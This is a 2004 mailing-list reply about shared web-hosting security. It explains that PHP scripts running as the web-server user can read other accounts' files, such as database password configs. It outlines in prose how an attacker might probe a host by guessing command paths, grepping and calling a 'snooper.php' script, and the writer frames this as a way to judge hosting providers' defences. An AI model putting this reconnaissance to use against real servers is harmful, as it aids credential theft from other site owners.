[CLUE-Tech] Cracking websites

Jed S. Baer thag at frii.com
Sun Feb 22 17:27:28 MST 2004


On Sun, 22 Feb 2004 17:02:05 -0500
Angelo Bertolli <angelo at freeshell.org> wrote:

> Maybe I'm being naive, but what I don't understand is how this is much 
> of a problem.  If something is world readable, then it is already 
> readable by anyone.  If something is readable by nobody, then it is 
> readable by the people on the net.

It's an issue because if you're doing any kind of dynamic content, you
need to be able to access and change that content from the web server
environment.

For example, I have a MySQL database I use to store various info. My PHP
script needs to connect to the database to manipulate that data. So, I
have a config file which stores the username/password combination used to
connect to the database. My script needs to read that file. My script,
since it's initiated by the httpd daemon, runs with the same permissions
as the httpd daemon.

PHP (or other scripting languages) aren't restricted from file access in
the same way that static HTTPD requests are. Go to www.php.net and look at
the fopen or system functions.

There are ways, using various Apache directives, to restrict _viewing_ of
files by "plain vanilla" http requests. So not everything readable by the
httpd user is accessible via a plain http request. The problem comes up
when you essentially exit the webserver environment by invoking a
programming language.

> This is why cgi scripts and php 
> scripts themselves are meant to be secured.  Whenever I have a file 
> which is world readable on my account, I always remember that it's world
> readable... secondly, I don't write php scripts which allow anyone to 
> execute commands on the server.  As a user of the server I have certain 
> priviledges that others don't.  So just at the operating system level 
> there isn't any life-or-death insecurity with this.

The question isn't what your or I would write as a well-secured CGI
program. It's what some cracker would try to do, and how to be certain
that a chosen web hosting company doesn't allow the attack.

> Also, as per your example, I think you must know exactly where the files
> are located.  I'm not sure executing ls is possible unless you know 
> where ls is.  I could be wrong, but I don't think the PHP script has a 
> PATH associated with it.

Nope, I need to know very little. As long as I know the server is a Unix
variant, I assume the existence of various commands, and try them out to
see what I get. I can easily guess that the location of the ls command is
either /bin/ls or /usr/bin/ls or something close to that.

Combine that with knowledge of a few common scripting packages used for
online merchant setups, content management systems, or once you know can
get away with it, creative uses of grep, and the discovery process is
merely a matter of persistence.

> I'd be interested in anything you find out.  Do you specifically want to
> tell apache not to allow any php script to read a directory which is not
> within its own directory or subdirectories or something?

What I want is the ability to determine whether a hosting company I choose
is providing appropriate security against this sort of attack.

Jim Feldman (and somebody else) mentioned the suExec environment, but it
looks to me as if that applies only for http requests which fall into the
virtual hosting (*not* virtual machine hosting) category. In other words,
if my request is of the form
http://the.hostingcompany.com/~myaccountname/snooper.php, it avoids those
Apache directives. And, yes, I do know of hosting companies which allow
CGI to be invoked in that fashion. In fact, getting to your site via the
non-virtual-domain-host arrangement has been possible on every hosting
company I've used.

jed
-- 
http://s88369986.onlinehome.us/freedomsight/

... it is poor civic hygiene to install technologies that could someday
facilitate a police state. -- Bruce Schneier



More information about the clue-tech mailing list